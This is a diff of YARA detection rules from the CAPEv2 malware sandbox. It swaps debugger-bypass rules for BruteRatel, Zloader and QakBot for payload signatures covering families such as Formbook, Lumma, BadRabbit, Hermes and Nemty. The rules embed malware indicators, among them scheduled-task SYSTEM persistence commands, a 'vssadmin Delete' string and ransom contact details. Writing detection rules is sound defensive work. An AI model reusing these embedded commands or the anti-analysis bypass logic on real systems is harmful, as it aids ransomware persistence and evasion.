+		$crypto32_3 = {F6 46 03 02 75 5? 8B 46 10 40 50 E8 [10-12] 74 ?? F6 46 03 01 74}
+		$crypto32_4 = {C7 44 24 10 01 00 00 00 8B 4? 10 [12] 8B [2] 89 01 8B 44 24 10 5F 5E 5B 8B E5 5D C2 0C 00}
+		$cpuid = {8B C4 FF 18 8B F0 33 C0 0F A2 66 8C D8 66 8E D0 8B E5 8B C6 5E 5B 5D C3}
+		$cape_string = "cape_options"
 
 	condition:
-		$loader and any of ( $decrypt* )
+		uint16( 0 ) == 0x5A4D and 1 of ( $crypto32_* ) and $cpuid and not $cape_string
 }
-rule CAPE_Bruteratelsyscall
+rule CAPE_Obfuscar : FILE
 {
 	meta:
-		description = "BruteRatel Syscall Bypass"
+		description = "Obfuscar xor routime"
 		author = "kevoreilly"
-		id = "0ddc3e0a-c4ca-5342-b029-107ce1f2751e"
-		date = "2024-07-22"
-		modified = "2024-07-22"
+		id = "81eeb62f-578f-5c75-bc96-091d5727a20a"
+		date = "2025-03-07"
+		modified = "2025-03-07"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/BruteRatel.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "5ed054b3cd5d2659c250945d55d6adac90945963c34ad2af0f8d7436141e86b6"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Obfuscar.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "54581e83e5fa13fae4bda74016b3fa1d18c92e2659f493ebe54d70fd5f77bba5"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_options = "sysbp=$syscall1+6,sysbp=$syscall2+8"
+		tags = "FILE"
 
 	strings:
-		$syscall1 = {49 89 CA 4? 89 ?? (41 FF|FF)}
-		$syscall2 = {49 89 CA 48 8B 44 24 ?? FF 64 24}
+		$decode = {06 91 06 61 20 [4] 61 D2 9C 06 17 58 0A 06 7E [4] 8E 69 FE 04 2D ?? 2A}
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule CAPE_Bruteratelpacker
+rule CAPE_Bazar : FILE
 {
 	meta:
-		description = "BruteRatel Outer Encryption Layer"
+		description = "No description has been set in the source file - CAPE"
 		author = "kevoreilly"
-		id = "631083be-7058-590a-a394-984545f42ad7"
-		date = "2024-07-22"
-		modified = "2024-07-22"
+		id = "e042f180-2a82-5c93-9858-77281557dd10"
+		date = "2022-06-09"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/BruteRatel.yar#L14-L26"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "2ccb17efe378d034df34d20d7580c58171d0fd11c18fef6c9a23f1ba238514e6"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Bazar.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "9375f59b56e47fd0b90b089afdf3be8f16f960038fc625523a2e2d5509ab099d"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_options = "bp1=$outer*,action1=scan,count=0"
+		tags = "FILE"
+		cape_type = "Bazar Payload"
 
 	strings:
-		$outer = {83 45 F8 01 81 7D F8 FF 00 00 00 7E ?? 83 45 FC 01 8B 45 FC 3B 45 ?? 7E ?? 48}
-		$inner = {88 E3 32 1C 0E 88 5C 15 00 48 8D 49 01 48 8D 52 01 38 C1 76 ?? 48 01 CE EB ?? FF}
-		$date = {48 8B 17 48 85 D2 0F 85 [2] 00 00 8B 47 08 85 C0 0F 85 [2] 00 00}
+		$decode = {F7 E9 [0-2] C1 FA 0? 8B C2 C1 E8 1F 03 D0 6B C2 ?? 2B C8}
+		$rsa = {C7 00 52 53 41 33 48 8D 48 09 C7 40 04 00 08 00 00 4C 8D 05 [3] 00 C6 40 08 03 B8 09 00 00 00 [0-3] 48 8D 89 80 00 00 00 41 0F 10 00}
 
 	condition:
-		($outer ) and not ( $inner ) and not ( $date )
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule CAPE_Bruterateldate
+rule CAPE_Formbook
 {
 	meta:
-		description = "BruteRatel Date Check Bypass"
+		description = "Formbook Payload"
 		author = "kevoreilly"
-		id = "94dd5cf3-ed59-51d6-92c8-aee73fe2926b"
-		date = "2024-07-22"
-		modified = "2024-07-22"
+		id = "3389c0a7-eb86-5465-8a14-63f812d257db"
+		date = "2023-10-13"
+		modified = "2023-10-13"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/BruteRatel.yar#L28-L39"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "88589b2d08aea03565668ff1b9af20b6fe11cda50d867c60db7cb4d1826b0fd7"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Formbook.yar#L1-L18"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "63ee4dd6fe5ed2a3e5ee88ba7de48d2c9e0024961a550d0fdb68891c9885e05e"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_options = "clear,bp1=$inner*,action1=scan,bp2=$date+6,action2=skip,count=0"
+		cape_type = "Formbook Payload"
+		packed = "9e38c0c3c516583da526016c4c6a671c53333d3d156562717db79eac63587522"
+		packed = "2379a4e1ccdd7849ad7ea9e11ee55b2052e58dda4628cd4e28c3378de503de23"
 
 	strings:
-		$inner = {88 E3 32 1C 0E 88 5C 15 00 48 8D 49 01 48 8D 52 01 38 C1 76 ?? 48 01 CE EB ?? FF}
-		$date = {48 8B 17 48 85 D2 0F 85 [2] 00 00 8B 47 08 85 C0 0F 85 [2] 00 00}
+		$remap_ntdll = {33 56 0? 8D 86 [2] 00 00 68 F0 00 00 00 50 89 56 ?? E8 [4] 8B [1-5] 6A 00 6A 04 8D 4D ?? 51 6A 07 52 56 E8 [4] 8B 45 ?? 83 C4 20 3B}
+		$rc4dec = {F7 E9 C1 FA 03 8B C2 C1 E8 1F 03 C2 8D 04 80 03 C0 03 C0 8B D1 2B D0 8A 04 3A 88 8C 0D [4] 88 84 0D [4] 41 81 F9 00 01 00 00 7C}
+		$decrypt = {8A 50 01 28 10 48 49 75 F7 83 FE 01 76 14 8B C7 8D 4E FF 8D 9B 00 00 00 00 8A 50 01 28 10 40 49 75 F7}
+		$string = {33 C0 66 39 01 74 0B 8D 49 00 40 66 83 3C 41 00 75 F8 8B 55 0C 8D 44 00 02 50 52 51 E8}
+		$mutant = {64 A1 18 00 00 00 8B 40 ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 8B E5 5D C3}
+		$postmsg = {8B 7D 0C 6A 00 6A 00 68 11 01 00 00 57 FF D6 85 C0 75 ?? 50}
 
 	condition:
-		any of them
+		2 of them
 }
-rule CAPE_Bruteratelconfig
+rule CAPE_Lumma : FILE
 {
 	meta:
-		description = "BruteRatel Config Extraction"
+		description = "Lumma Payload"
 		author = "kevoreilly"
-		id = "5ae680b0-5ad2-5e82-87f8-b0af4fec18de"
-		date = "2024-07-22"
-		modified = "2024-07-22"
+		id = "6ec1e0dc-028b-5135-9d0a-462718d90fe3"
+		date = "2024-10-22"
+		modified = "2024-10-22"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/BruteRatel.yar#L41-L51"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "b1815aafec940ab6c8daafc68ccf294845221ada260de5209dcb7e49ccd061c7"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Lumma.yar#L1-L15"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "44408ffa7870dbc1a8a31567dd743f46542da01ed8083e5413392920b9d1bafe"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_options = "clear,br1=$decode,count=0,action0=string:eax,typestring=BruteRatel Config"
+		tags = "FILE"
+		cape_type = "Lumma Payload"
+		packed = "0ee580f0127b821f4f1e7c032cf76475df9724a9fade2e153a69849f652045f8"
+		packed = "23ff1c20b16d9afaf1ce443784fc9a025434a010e2194de9dec041788c369887"
 
 	strings:
-		$decode = {55 57 56 53 48 83 EC ?? 31 C0 48 89 CB 48 89 D7 44 89 C6 44 89 CD 44 39 01 77 ?? 41 8D 48 01 E8 [4] 31 C9}
+		$decode1 = {C1 (E9|EA) 02 [0-3] 0F B6 (44|4C) ?? FF 83 (F8|F9) 3D 74 05 83 (F8|F9) 2E 75 01 (49|4A) [0-30] 2E 75}
+		$decode2 = {B0 40 C3 B0 3F C3 89 C8 04 D0 3C 09 77 06 80 C1 04 89 C8 C3 89 C8 04 BF 3C}
+		$decode3 = {B0 40 C3 B0 3F C3 80 F9 30 72 ?? 80 F9 39 77 06 80 C1 04 89 C8 C3}
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and any of them
 }
-rule CAPE_Smokeloader : FILE
+rule CAPE_Badrabbit : FILE
 {
 	meta:
-		description = "SmokeLoader Payload"
+		description = "BadRabbit Payload"
 		author = "kevoreilly"
-		id = "9df0eca1-009f-5e7e-af9f-9529581fb4b4"
-		date = "2023-02-06"
-		modified = "2023-02-06"
+		id = "c7204772-6f14-57b7-88c1-e9156f9897d5"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/SmokeLoader.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "4b15162f4b754cdd6a9124f29f0fd979085734063a0b17f2a97a9750f29e2e0b"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/BadRabbit.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "309e14ab4ea2f919358631f9d8b2aaff1f51e7708b6114e4e6bf4a9d9a5fc86c"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "bp0=$gate+19,action0=DumpSectionViews,count=1"
+		cape_type = "BadRabbit Payload"
 
 	strings:
-		$gate = {68 [2] 00 00 50 E8 [4] 8B 45 ?? 89 F1 8B 55 ?? 9A [2] 40 00 33 00 89 F9 89 FA 81 C1 [2] 00 00 81 C2 [2] 00 00 89 0A 8B 46 ?? 03 45 ?? 8B 4D ?? 8B 55 ?? 9A [2] 40 00 33 00}
+		$a1 = "caforssztxqzf2nm.onion" wide
+		$a2 = "schtasks /Create /SC once /TN drogon /RU SYSTEM" wide
+		$a3 = "schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
 }
-rule CAPE_Zloader : FILE
+rule CAPE_Cerber : FILE
 {
 	meta:
-		description = "Zloader API Spam Bypass"
+		description = "Cerber Payload"
 		author = "kevoreilly"
-		id = "8a8e7102-1138-59e7-95a6-8647d41d8521"
-		date = "2024-05-03"
-		modified = "2024-05-03"
+		id = "edf08795-cf54-5822-8bc4-35cfba0fe8e8"
+		date = "2022-06-09"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/Zloader.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "319adca805083c7f5854fe840447cf961addbd748f1f25eb8ec8cdeed7af38aa"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Cerber.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "16a8f808c28d3b142c079a305aba7f553f2452e439710bf610a06f8f2924d5a3"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "bp0=$trap1-5,action0=hooks:0,bp1=$traps-108,action1=jmp:15,bp2=$traps-88,action2=hooks:1,count=0"
+		cape_type = "Cerber Payload"
 
 	strings:
-		$trap1 = {81 F7 4C 01 00 00 8D B4 37 [2] FF FF 31 FE 69 FE 95 03 00 00 E8 [4] 31 FE 0F AF FE 0F AF FE E8}
-		$traps = {6A 44 53 E8 [2] FF FF 83 C4 08 8D 85 ?? FF FF FF C7 85 ?? FF FF FF 44 00 00 00 50}
+		$code1 = {33 C0 66 89 45 8? 8D 7D 8? AB AB AB AB AB [0-2] 66 AB 8D 45 8? [0-3] E8 ?? ?? 00 00}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Zloader_2024 : FILE
+rule CAPE_Nemty : FILE
 {
 	meta:
-		description = "Zloader Registry and Modulename Bypass"
-		author = "enzok"
-		id = "7100c27e-021f-552c-9a75-84b07a2f837e"
-		date = "2024-05-03"
-		modified = "2024-05-03"
+		description = "Nemty Ransomware Payload"
+		author = "kevoreilly"
+		id = "3aa8e1d7-f9cb-5b04-923d-7bed15ab8c3f"
+		date = "2020-04-03"
+		modified = "2020-04-03"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/Zloader.yar#L14-L26"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "38d555ef5f613cf7ca043697c479100a7a22e7f043acf8b6a46f8009eb92fd7e"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Nemty.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "a05974b561c67b4f1e0812639b74831edcf65686a06c0d380f0b45739e342419"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "bp0=$reg_1*+1,bp0=$reg_2*+1,action0=seteax:1,count=0"
+		cape_type = "Nemty Payload"
 
 	strings:
-		$reg_1 = {FF D0 83 F8 00 0F 94 C0 24 01 88 44 24 ?? 4? 8B [3] B? [9-25] E8 [4] 4? 89 F1 FF D0 8A [3] 24 01 0F B6 C0}
-		$reg_2 = {B9 [4] E8 [4] 8B [3] 89 C2 E8 [4] 4? [4] ff D0 8A [3] 24 01 0F B6 C0}
-		$name_1 = {56 5? 5? 4? 81 EC [4] C7 44 24 ?? 00 00 00 00 4? 8D 0D [4] E8 [4] 4? 89 [3] 4? 83 [3] 00 75}
+		$tordir = "TorDir"
+		$decrypt = "DECRYPT.txt"
+		$nemty = "NEMTY"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Qakbot5 : FILE
+rule CAPE_Hermes : FILE
 {
 	meta:
-		description = "QakBot WMI anti-anti-vm"
+		description = "Hermes Payload"
 		author = "kevoreilly"
-		id = "d287b043-15df-5865-ad4c-9eb64ceec04c"
-		date = "2024-02-16"
-		modified = "2024-02-16"
+		id = "0ff44422-9c14-517b-9e71-8e9e19694f06"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/QakBot.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "303ea2d8d1a7f0fd0ca5508dae2c1b83c03b1e3e975760f15d36d93bcc152767"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Hermes.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "9bc974173f39a57e7adfbf8ae106a20d960557696b4c3ce16e9b4e47d3e9e95b"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "bp0=$loop+35,action0=skip,count=0"
-		packed = "f4bb0089dcf3629b1570fda839ef2f06c29cbf846c5134755d22d419015c8bd2"
+		cape_type = "Hermes Payload"
 
 	strings:
-		$loop = {8B 75 ?? 48 8B 4C [2] FF 15 [4] 48 8B 4C [2] 48 8B 01 FF 50 ?? 8B DE 48 8B 4C [2] 48 85 C9 0F 85 [4] EB 4E}
-		$conf = {0F B7 1D [4] B9 [2] 00 00 E8 [4] 8B D3 48 89 45 ?? 45 33 C9 48 8D 0D [4] 4C 8B C0 48 8B F8 E8}
+		$ext = ".HRM" wide
+		$vss = "vssadmin Delete"
+		$email = "supportdecrypt@firemail.cc" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		uint16( 0 ) == 0x5A4D and all of ( $* )
 }
-rule CAPE_Qakbot4 : FILE
+rule CAPE_Kovter : FILE
 {
 	meta:
-		description = "QakBot Config Extraction"
+		description = "Kovter Payload"
 		author = "kevoreilly"
-		id = "401184cf-bbd7-5afe-9589-470f54721af1"
-		date = "2024-02-16"
-		modified = "2024-02-16"
+		id = "3dec3c4b-4678-5ed1-a4c3-c3d9abb58b1c"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/QakBot.yar#L15-L29"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "ad75b07b9b786f634fd46cbe6dc089d3f732673320e70714e8ab058f0392c9f5"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Kovter.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "888fccb8fbfbe6c05ec63bc5658b4743f8e10a96ef51b3868c2ff94afec76f2d"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config"
-		packed = "f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68"
+		cape_type = "Kovter Payload"
 
 	strings:
-		$params = {8B 7D ?? 8B F1 57 89 55 ?? E8 [4] 8D 9E [2] 00 00 89 03 59 85 C0 75 08 6A FC 58 E9}
-		$c2list1 = {59 59 8D 4D D8 89 45 E0 E8 [4] 8B 45 E0 85 C0 74 ?? 8B 90 [2] 00 00 51 8B 88 [2] 00 00 6A 00 E8}
-		$c2list2 = {59 59 8B F8 8D 4D ?? 89 7D ?? E8 [4] 85 FF 74 52 8B 97 [2] 00 00 51 8B 8F [2] 00 00 53 E8}
-		$conf = {5F 5E 5B C9 C3 51 6A 00 E8 [4] 59 59 85 C0 75 01 C3}
+		$a1 = "chkok"
+		$a2 = "k2Tdgo"
+		$a3 = "13_13_13"
+		$a4 = "Win Server 2008 R2"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
 }
-rule CAPE_Qakbotloader : FILE
+rule CAPE_Rhadamanthys
 {
 	meta:
-		description = "QakBot Export Selection"
+		description = "Rhadamanthys Loader"
 		author = "kevoreilly"
-		id = "b2d5ef1c-0651-5249-9c4b-7e83235d4a30"
-		date = "2024-02-16"
-		modified = "2024-02-16"
+		id = "4683ef43-7397-5546-ae54-b4c000518182"
+		date = "2023-09-18"
+		modified = "2023-09-18"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/QakBot.yar#L31-L46"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "6f99171c95a8ed5d056eeb9234dbbee123a6f95f481ad0e0a966abd2844f0e1a"
-		logic_hash = "00869c0a9bf62cde3f46ca915b0ef689557b09dc58d6de34609e3998abfa7e98"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Rhadamanthys.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "f71bee3ef1dd7b16a55397645d16c0a20d1fdd3bf662f241c0b11796629b11ff"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_options = "export=$export1,export=$export2,export=$export3"
+		tags = ""
+		cape_type = "Rhadamanthys Loader"
 
 	strings:
-		$export1 = {55 8B EC 83 EC 50 (3A|66 3B) ?? 74}
-		$export2 = {55 8B EC 3A ?? 74 [8-16] 74 [6-16] EB}
-		$export3 = {55 8B EC 66 3B ?? 74 [3-5] 74}
-		$wind = {(66 3B|3A) ?? 74 [1-14] BB 69 04 00 00 53 E? [5-20] 74}
-		$getteb = {EB 00 55 8B EC 66 3B E4 74 ?? [1-5] 64 A1 18 00 00 00 5D EB}
+		$rc4 = {88 4C 01 08 41 81 F9 00 01 00 00 7C F3 89 75 08 33 FF 8B 4D 08 3B 4D 10 72 04 83 65 08 00}
+		$code = {8B 4D FC 3B CF 8B C1 74 0D 83 78 04 02 74 1C 8B 40 1C 3B C7 75 F3 3B CF 8B C1 74 57 83 78 04 17 74 09 8B 40 1C 3B C7 75 F3 EB}
+		$conf = {46 BB FF 00 00 00 23 F3 0F B6 44 31 08 03 F8 23 FB 0F B6 5C 39 08 88 5C 31 08 88 44 39 08 02 C3 8B 5D 08 0F B6 C0 8A 44 08 08}
+		$cape_string = "cape_options"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( any of ( $export* ) ) and ( $wind or $getteb )
+		2 of them and not $cape_string
 }
-rule CAPE_Qakbotantivm
+rule CAPE_Qakbot5 : FILE
 {
 	meta:
-		description = "QakBot AntiVM bypass"
-		author = "kevoreilly"
-		id = "7446522a-788a-512d-ad68-2fcc56169f5a"
-		date = "2024-02-16"
-		modified = "2024-02-16"
+		description = "QakBot v5 Payload"
+		author = "kevoreilly, enzok"
+		id = "48866cdd-f60e-50b8-85f9-573710934b0b"
+		date = "2024-04-28"
+		modified = "2024-04-28"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/QakBot.yar#L48-L59"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "e269497ce458b21c8427b3f6f6594a25d583490930af2d3395cb013b20d08ff7"
-		logic_hash = "20f1cd28f38945a3aa328e77e78525fb1ffc47ecf54d5a40c2f18264c3973989"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/QakBot.yar#L1-L15"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		hash = "59559e97962e40a15adb2237c4d01cfead03623aff1725616caeaa5a8d273a35"
+		logic_hash = "cc23a92f45619d44af824128b743c259dd9dfa7cb5106932f3425f3dfd1dccdf"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_options = "bp0=$antivm1,action0=unwind,count=1"
+		tags = "FILE"
+		cape_type = "QakBot Payload"
+		packed = "f4bb0089dcf3629b1570fda839ef2f06c29cbf846c5134755d22d419015c8bd2"
 
 	strings:
-		$antivm1 = {55 8B EC 3A E4 0F [2] 00 00 00 6A 04 58 3A E4 0F [2] 00 00 00 C7 44 01 [5] 81 44 01 [5] 66 3B FF 74 ?? 6A 04 58 66 3B ED 0F [2] 00 00 00 C7 44 01 [5] 81 6C 01 [5] EB}
+		$loop = {8B 75 ?? 48 8B 4C [2] FF 15 [4] 48 8B 4C [2] 48 8B 01 FF 50 ?? 8B DE 48 8B 4C [2] 48 85 C9 0F 85 [4] EB 4E}
+		$c2list = {0F B7 1D [4] B? [2] 00 00 E8 [4] 8B D3 4? 89 45 ?? 4? 33 C9 4? 8D 0D [4] 4? 8B C0 4? 8B F8 E8}
+		$campaign = {0F B7 1D [4] B? [2] 00 00 E8 [4] 8B D3 4? 89 44 24 ?? 4? 33 C9 4? 8D 0D [4] 4? 8B C0 4? 8B F8 E8}
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule CAPE_Heavenssyscall : FILE
+rule CAPE_Qakbot4 : FILE
 {
 	meta:
-		description = "Bypass variants of heaven's gate direct syscalls"
+		description = "QakBot v4 Payload"
 		author = "kevoreilly"
-		id = "7c60102a-ac8b-5e28-8dbb-4b6c3f4cddff"
-		date = "2024-03-25"
-		modified = "2024-03-25"
+		id = "d2c5316c-22cc-5b6d-b6a2-b1d23a06d16b"
+		date = "2024-04-28"
+		modified = "2024-04-28"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/HeavensSyscall.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "aeb981fcba0936ff8b1be4c601445fd45e5d3b74856a9439d351edd57f5a50c3"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/QakBot.yar#L17-L35"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "b2870e33abffbb3ff49b7891b0f5c538ab48ee63da5553929d4e37dec921344f"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "clear,br0=$gate1-9,action1=seteax:0,count=0,sysbp=$sysenter+10"
-		packed = "2950b4131886e06bdb83ab1611b71273df23b0d31a4d8eb6baddd33327d87ffa"
+		cape_type = "QakBot Payload"
 
 	strings:
-		$gate1 = {00 00 00 00 74 24 8D 45 F8 50 6A FF FF 95 [4] 85 C0 74 08 8B 4D F8 89 4D FC EB 07 C7 45 FC 00 00 00 00 8B 45 FC EB 02 33 C0 8B E5 5D C2 C0}
-		$sysenter = {68 [4] E8 [4] E8 [4] C2 ?? 00 CC CC CC CC CC CC CC CC}
+		$crypto1 = {8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 C9 00 FF FF FF 41}
+		$sha1_1 = {5? 33 F? [0-9] 89 7? 24 ?? 89 7? 24 ?? 8? [1-3] 24 [1-4] C7 44 24 ?0 01 23 45 67 C7 44 24 ?4 89 AB CD EF C7 44 24 ?8 FE DC BA 98 C7 44 24 ?C 76 54 32 10 C7 44 24 ?0 F0 E1 D2 C3}
+		$sha1_2 = {33 C0 C7 01 01 23 45 67 89 41 14 89 41 18 89 41 5C C7 41 04 89 AB CD EF C7 41 08 FE DC BA 98 C7 41 0C 76 54 32 10 C7 41 10 F0 E1 D2 C3 89 41 60 89 41 64 C3}
+		$anti_sandbox1 = {8D 4? FC [0-1] E8 [4-7] E8 [4] 85 C0 7E (04|07) [4-7] 33 (C0|D2) 74 02 EB FA}
+		$anti_sandbox2 = {8D 45 ?? 50 E8 [2] 00 00 59 68 [4] FF 15 [4] 89 45 ?? 83 7D ?? 0F 76 0C}
